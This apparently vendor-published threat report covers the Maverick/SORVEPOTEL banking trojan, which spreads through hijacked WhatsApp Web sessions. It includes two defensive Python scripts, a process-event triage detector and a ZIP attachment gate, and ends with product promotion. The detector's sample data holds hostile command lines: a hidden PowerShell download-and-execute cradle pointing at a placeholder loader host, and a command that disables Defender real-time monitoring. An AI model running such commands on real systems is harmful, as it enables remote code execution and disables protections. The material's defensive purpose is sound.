Cybersecurity experts have identified troubling similarities between Maverick, a new strain of malware spreading via WhatsApp, and Coyote, a well-known Brazilian banking trojan. Evidence suggests both are part of the same increasingly sophisticated and hard-to-detect digital threat ecosystem.
According to reports from CyberProof, Trend Micro, and Sophos, both trojans share several key characteristics:
They are developed in .NET.
They primarily target Brazilian users and banks.
They use nearly identical code to monitor URLs and steal credentials.
They can spread via WhatsApp Web, significantly increasing their reach.
In this context, Maverick stands out as a more advanced and dangerous version. It has been attributed to a threat group known as Water Saci and combines credential theft with self-propagation capabilities, effectively operating as a self-sustaining botnet that spreads without user intervention.
The Maverick campaign starts with something seemingly harmless: a ZIP file sent through WhatsApp Web. Inside the archive hides a Windows shortcut file (.LNK) that, when executed, runs a PowerShell command. This command connects the device to the attacker’s server hosted at zapgrande[.]com, triggering the infection chain.
From there, the process unfolds in several stages:
Initial Execution: The .LNK file opens cmd.exe and uses PowerShell to download a malware loader.
Defense Evasion: The malware disables Microsoft Defender and User Account Control (UAC) to operate without restrictions or alerts.
Anti-Analysis: It checks for debugging or reverse engineering tools. If detected, the malware halts execution to avoid analysis.
Payload Delivery: It downloads two main modules:
SORVEPOTEL, responsible for WhatsApp-based propagation.
Maverick, the core banking trojan designed to steal credentials and financial data.
Geofiltering: The malware only activates if it detects the device is in Brazil, verifying language, time zone, and regional settings.
Additionally, according to CyberProof, there are signs that the group behind Maverick (Water Saci) has begun expanding its attacks beyond the banking sector, now targeting hotels and tourism companies in Brazil.
In this campaign, SORVEPOTEL and Maverick operate as a complementary duo: SORVEPOTEL handles malware distribution and propagation, while Maverick does the dirty work—stealing credentials, hijacking browsers, and executing remote commands.
Maverick includes several capabilities specifically designed to target banking users in the region:
Monitors browser tabs for URLs of banks and financial services in Latin America.
Injects or displays fake login pages (phishing) to capture usernames and passwords as victims attempt to access their banks.
Collects system and browser data, such as cookies, tokens, and other session information to facilitate access or fraud.
Executes commands from a remote C2 server, enabling reconnaissance, lateral movement, and persistence on the infected device.
SORVEPOTEL serves as the distribution engine: it handles self-propagation (especially via WhatsApp Web) and prepares the environment for Maverick to install and operate undetected.
The firms analyzing the campaign have detected a significant shift in tactics by the group tracked as Water Saci. Instead of relying solely on heavy .NET payloads, it now uses more discreet loaders built with Visual Basic Script (VBS) and PowerShell, which offer two clear advantages:
Increased stealth: VBS and PowerShell allow code execution in memory with fewer traces on disk, making it harder for traditional security solutions to detect them.
Greater flexibility: These loaders make it easier to deliver varied payloads and quickly adapt the campaign based on the target or region.
In short, Water Saci has refined its attack chain to be more evasive and modular, using SORVEPOTEL to spread and Maverick to monetize access to bank accounts and user sessions.
New Water Saci Attack Chain (Source: Trend Micro)
This campaign leverages ChromeDriver and Selenium to automate the victim's browser and hijack their WhatsApp Web session. With this access, attackers use the victim's own browser profile (including cookies, tokens, and more) to send malicious ZIP files to all their contacts—without triggering typical security alerts.
The user downloads and extracts a malicious ZIP file.
Inside is a VBS loader (Orcamento.vbs / SORVEPOTEL) that activates a PowerShell script (tadeu.ps1) and executes it in memory.
The script uses Selenium automation with ChromeDriver to take control of the WhatsApp Web session open in the browser.
From the hijacked session, the malware automatically sends malicious ZIP files to the victim’s contact list.
To conceal the activity, it displays a fake banner (“WhatsApp Automation v6.0”), so the victim doesn’t notice any obvious changes.
Additionally, the malware copies the victim’s Chrome profile—including cookies and authentication tokens—to perform a “clean” session hijack without needing QR codes or triggering login alerts.
The result is both powerful and dangerous: attackers gain instant access to WhatsApp accounts and can spread rapidly by using the victims themselves as vectors, all while avoiding common security alarms.
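The infection chain described above (a .LNK launching cmd.exe and a PowerShell download cradle, a VBS loader starting a PowerShell script, ChromeDriver driving a Chrome session with a copied profile, and Defender tampering) leaves a recognizable sequence in process-creation telemetry. The following triage script is an added example written for this article; it is not code from Trend Micro, Sophos, CyberProof or TecnetOne. It assumes events with the Sysmon Event ID 1 fields Image, CommandLine, ParentImage and ParentCommandLine, and the sample events are constructed, not captured from the campaign (the loader host is a placeholder; `Orcamento.vbs` and `tadeu.ps1` are the file names reported above). The Set-MpPreference rule is a generic Defender-tampering heuristic, not a claim about the specific command this malware runs.

```python
"""Heuristic triage of process-creation events for the Water Saci chain.

Added example for this article (not vendor or project code). Fields mirror
Sysmon Event ID 1; the SAMPLE_EVENTS below are constructed test data.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields."""
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str = ""


def _basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = SHELLS | {"wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle verbs commonly used by one-line script loaders.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I)
# Generic Defender-tampering heuristic (assumption: not campaign-specific).
DEFENDER_TAMPER = re.compile(r"set-mppreference.*-disable\w*", re.I)
DEFAULT_PROFILE = re.compile(r"\\appdata\\local\\google\\chrome\\user data", re.I)
USER_DATA_DIR = re.compile(r'--user-data-dir=("[^"]+"|\S+)', re.I)


def rule_download_cradle(e: ProcEvent) -> bool:
    """Shell or PowerShell command line that pulls code from a remote host."""
    return _basename(e.image) in SHELLS and bool(CRADLE.search(e.command_line))


def rule_vbs_to_powershell(e: ProcEvent) -> bool:
    """A .vbs running under wscript/cscript spawns PowerShell (VBS loader -> PS1)."""
    return (_basename(e.parent_image) in {"wscript.exe", "cscript.exe"}
            and ".vbs" in e.parent_command_line.lower()
            and _basename(e.image) in {"powershell.exe", "pwsh.exe"})


def rule_chromedriver_from_script(e: ProcEvent) -> bool:
    """ChromeDriver started by a script host rather than by a test runner or IDE."""
    return _basename(e.image) == "chromedriver.exe" and _basename(e.parent_image) in SCRIPT_HOSTS


def rule_chrome_copied_profile(e: ProcEvent) -> bool:
    """Chrome driven by ChromeDriver with a user-data-dir outside the default profile
    location (consistent with a copied profile used to reuse the WhatsApp Web session)."""
    if _basename(e.image) != "chrome.exe" or _basename(e.parent_image) != "chromedriver.exe":
        return False
    m = USER_DATA_DIR.search(e.command_line)
    return bool(m) and not DEFAULT_PROFILE.search(m.group(1))


def rule_defender_tamper(e: ProcEvent) -> bool:
    """PowerShell disabling a Defender preference."""
    return _basename(e.image) in SHELLS and bool(DEFENDER_TAMPER.search(e.command_line))


RULES = {
    "powershell_download_cradle": rule_download_cradle,
    "vbs_loader_spawns_powershell": rule_vbs_to_powershell,
    "chromedriver_launched_by_script_host": rule_chromedriver_from_script,
    "chrome_driven_with_copied_profile": rule_chrome_copied_profile,
    "defender_tamper_cmdlet": rule_defender_tamper,
}


def triage(events):
    """Return (rule_name, image) pairs for every event that matches a rule."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((name, _basename(e.image)))
    return hits


# Constructed sample telemetry: two benign events followed by the infection chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              'chrome.exe --profile-directory=Default', r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\nightly-backup.ps1", r"C:\Windows\System32\svchost.exe"),
    # .LNK -> cmd.exe -> PowerShell download cradle (both processes log the cradle).
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://[loader-host]/x\')"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://[loader-host]/x\')"',
              r"C:\Windows\System32\cmd.exe"),
    # VBS loader executing the PowerShell stage in memory.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "IEX (Get-Content C:\Users\ana\AppData\Local\Temp\tadeu.ps1 -Raw)"',
              r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\ana\Downloads\Orcamento.vbs"'),
    # Selenium/ChromeDriver started by the script, then Chrome with a copied profile.
    ProcEvent(r"C:\Users\ana\AppData\Local\Temp\chromedriver.exe", "chromedriver.exe --port=9515",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"chrome.exe --remote-debugging-port=0 --user-data-dir=C:\Users\ana\AppData\Local\Temp\wa_profile --no-first-run",
              r"C:\Users\ana\AppData\Local\Temp\chromedriver.exe"),
    # Defender tampering.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

if __name__ == "__main__":
    for rule_name, image in triage(SAMPLE_EVENTS):
        print(f"{rule_name:40s} {image}")
```

Each rule on its own is noisy (administrators do run download cradles, and developers do launch ChromeDriver from scripts); the value of this chain is that several rules fire on the same host within minutes, so in a SIEM the rule names would be correlated per host rather than alerted individually.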
Water Saci Campaign Timeline (Source: Trend Micro)
One of the most unusual aspects of the Water Saci ecosystem is how it communicates with infected machines. Instead of using traditional command-and-control servers, this group uses an email-based C2 infrastructure, relying on terra.com[.]br accounts protected with multi-factor authentication (MFA).
The malware connects directly to these inboxes via IMAP, from which it downloads commands sent by the attackers. This method makes its activity significantly harder to trace or block.
Some of the most common C2 commands include:
System control: rebooting, shutting down, or updating the machine.
File management: uploading, downloading, deleting, moving, or renaming files.
Remote execution: running CMD or PowerShell commands, taking screenshots, or listing active tasks.
Reconnaissance: gathering system information, searching for files, or listing directories.
Persistence: creating folders, checking email, or maintaining connection with the server.
This approach allows for manual, discreet, and flexible control. Even with MFA protection, operators can manually input codes to maintain undetected access.
With over 148 million active users in Brazil, WhatsApp is the most widely used communication platform for both personal and professional interactions. This makes it an ideal ground for malware campaigns.
Water Saci exploits this high level of trust in three main ways:
Through personal contacts: victims receive files from someone they know, reducing phishing suspicion.
By hijacking legitimate sessions: the malware uses an active WhatsApp Web session to spread, without requiring new logins or QR codes.
Using localized lures: the messages are written in Portuguese and tailored to the local context, increasing their credibility.
According to Trend Micro, this "conversion of trusted social apps into attack tools" marks a major evolution in the tactics of Brazilian cybercriminals—moving from spam emails to direct infections between contacts via messaging platforms.
Several cybersecurity firms (including Kaspersky and Sophos) confirm that Maverick shares code snippets, logical structure, and propagation methods with Coyote, an older banking trojan developed in .NET and also originating from Brazil.
Although there are differing views on whether Maverick is a rebranded version or an evolved variant, all agree that both belong to the same Brazilian threat ecosystem and share a common target: financial institutions.
Both organizations and users in Brazil and Latin America can significantly reduce the risk of infection from Maverick and Water Saci by applying cybersecurity best practices and advanced protection solutions.
At TecnetOne, we recommend implementing the following measures to strengthen your defense against these types of threats:
Block and monitor downloads of ZIP, LNK, VBS, and PowerShell files from unverified sources.
Restrict the use of automation tools like Selenium or ChromeDriver in corporate environments to prevent abuse in compromised browsers.
Adopt endpoint protection solutions with behavior-based detection, such as TecnetProtect, designed to detect and stop malware that runs via scripts or in-memory processes.
Enable multi-factor authentication (MFA) on WhatsApp, email, and other social platforms to prevent unauthorized access.
Train users on social engineering techniques, fake “automation” messages, and the risks of opening files shared via WhatsApp.
Regularly clear browser cookies and sessions to reduce the chance of session hijacking.
Monitor IMAP email traffic for unusual behavior or suspicious authentication attempts that may indicate malicious activity.
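The first recommendation above, blocking and monitoring ZIP, LNK, VBS and PowerShell files from unverified sources, is usually enforced at a mail or messaging gateway that has to look inside the archive rather than at its name. The inspector below is an added example written for this article, not TecnetOne or TecnetProtect code. It assumes an archive is available as bytes, flags script and shortcut types, double extensions that disguise a script as a document, and nested ZIPs up to a fixed depth, and treats an unreadable archive as a finding rather than letting it through. The archives it checks are built in memory from constructed entries (`Orcamento.lnk` and `tadeu.ps1` are the file names reported above; their contents here are placeholder bytes).

```python
"""Content-based ZIP attachment gate for LNK/VBS/PowerShell lures.

Added example for this article (not vendor code). Sample archives are
constructed in memory; entry contents are placeholders.
"""
import io
import zipfile
from pathlib import PureWindowsPath

# File types that execute code or scripts when double-clicked on Windows.
RISKY_EXTENSIONS = {".lnk", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1",
                    ".hta", ".exe", ".scr", ".bat", ".cmd"}
# Document/image types used as the visible half of a double extension.
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}


def inspect_zip(data: bytes, depth: int = 0, max_depth: int = 2) -> list:
    """Return human-readable findings for an archive; an empty list means nothing risky."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        # Unreadable archives are not waved through: they may be corrupt or disguised.
        return ["not a valid ZIP archive (possibly corrupt or disguised)"]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Normalise separators so entries with Windows-style paths are handled too.
            name = PureWindowsPath(info.filename.replace("/", "\\")).name
            suffixes = [s.lower() for s in PureWindowsPath(name).suffixes]
            ext = suffixes[-1] if suffixes else ""
            if ext in RISKY_EXTENSIONS:
                findings.append(f"{info.filename}: executable/script type {ext}")
            if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTENSIONS and ext in RISKY_EXTENSIONS:
                findings.append(f"{info.filename}: double extension ({suffixes[-2]}{ext}) "
                                "disguising a script as a document")
            if ext == ".zip" and depth < max_depth:
                # Recurse into nested archives, prefixing findings with the outer entry.
                nested = inspect_zip(zf.read(info), depth + 1, max_depth)
                findings.extend(f"{info.filename} -> {f}" for f in nested)
    return findings


def verdict(data: bytes) -> str:
    """Gate decision: 'block' if any finding, otherwise 'allow'."""
    return "block" if inspect_zip(data) else "allow"


def build_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a harmless PDF, a shortcut lure, a double-extension lure,
# a nested archive carrying a PowerShell script, and a non-ZIP blob.
SAMPLES = {
    "benign_pdf": build_zip({"Orcamento.pdf": b"%PDF-1.4 placeholder"}),
    "lnk_lure": build_zip({"Orcamento.lnk": b"L\x00\x00\x00 placeholder"}),
    "double_ext": build_zip({"Nota_fiscal.pdf.vbs": b"' placeholder"}),
    "nested": build_zip({"docs.zip": build_zip({"tadeu.ps1": b"# placeholder"})}),
    "not_zip": b"this is not an archive",
}

if __name__ == "__main__":
    for label, data in SAMPLES.items():
        print(f"{label:12s} {verdict(data):5s} {inspect_zip(data)}")
```

Checking names inside the archive is deliberately cheap and deterministic, so it can run inline on every attachment; it complements rather than replaces behaviour-based endpoint detection, since a renamed payload or a password-protected archive still needs the endpoint controls listed above.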
At TecnetOne, we offer specialized solutions in advanced threat detection, endpoint protection, and user awareness—designed to help companies prevent attacks like Maverick before they cause damage.